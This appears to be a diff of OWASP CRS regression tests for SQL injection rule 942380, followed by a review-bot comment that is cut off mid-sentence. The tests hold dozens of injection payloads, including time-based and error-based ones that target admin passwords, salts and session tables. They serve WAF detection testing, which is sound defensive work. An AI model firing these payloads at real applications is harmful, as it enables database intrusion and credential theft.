942380-22 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id 
"942380" - - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-30 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" - 
version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-31 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute node_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-32 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute scald" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-33 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute system" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-34 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute user_" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-35 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute views" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-36 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute patha" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-37 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute workb" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-38 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "execute panel" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-39 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=from+information_schema.tables+where+1%3D2+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-40 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-41 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-42 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-43 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - - test_title: 942380-44 - desc: "SQL Injection Attack" - stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942380.yaml +tests: + - test_title: 942380-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `db_miwf`.`sys_refindex` limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from `information_schema`.tables limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ORder by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "ordeR by" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + 
dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-11 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-12 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-13 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-14 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "SELECT 'qzxjq'||(SELECT (CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-15 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute php" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-16 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-17 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "Execute(" + version: HTTP/1.0 + output: + log_contains: id 
"942380" + - test_title: 942380-18 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-19 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-20 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-21 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-22 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "HAVING+1%3D" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-23 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute+elysi" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-24 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-25 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" 
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-26 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-27 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-28 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-29 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-30 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-31 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute node_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-32 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute scald" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-33 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute system" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-34 + desc: "SQL Injection 
Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute user_" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-35 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute views" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-36 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute patha" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-37 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute workb" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-38 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "execute panel" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 
942380-39 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=from+information_schema.tables+where+1%3D2+limit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-40 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-41 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-42 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-43 + desc: "SQL Injection Attack" + 
stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-44 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit" + version: HTTP/1.0 + output: + log_contains: id "942380" + - test_title: 942380-45 + desc: "SQL Injection Attack: EXISTS" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))" + version: HTTP/1.0 + output: + log_contains: id "942380" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 4223f97617..14fbd48002 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml 
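Review bot: The new test 942380-45 at the end of the hunk sends its payload with `%20`-encoded spaces in a POST body while every other test in this file uses `+` (e.g. 942380-39), and none of the stages declares a `Content-Type`; whether the body is URL-decoded before rule 942380 inspects it therefore depends on the test runner's default body handling, which is not visible here, so adding `Content-Type: application/x-www-form-urlencoded` to the new stage's headers would make the intent explicit rather than implied. On documentation, 44 of the 45 tests share the literal `desc: "SQL Injection Attack"`, whereas the neighbouring 942370 tests name the regex alternative each payload exercises in `desc`; a per-test description such as `desc: "SQL Injection Attack: ORDER BY, mixed case"` or `desc: "SQL Injection Attack: FROM ... LIMIT"` would tell a maintainer which branch of the rule a failing test covers. The file also has no 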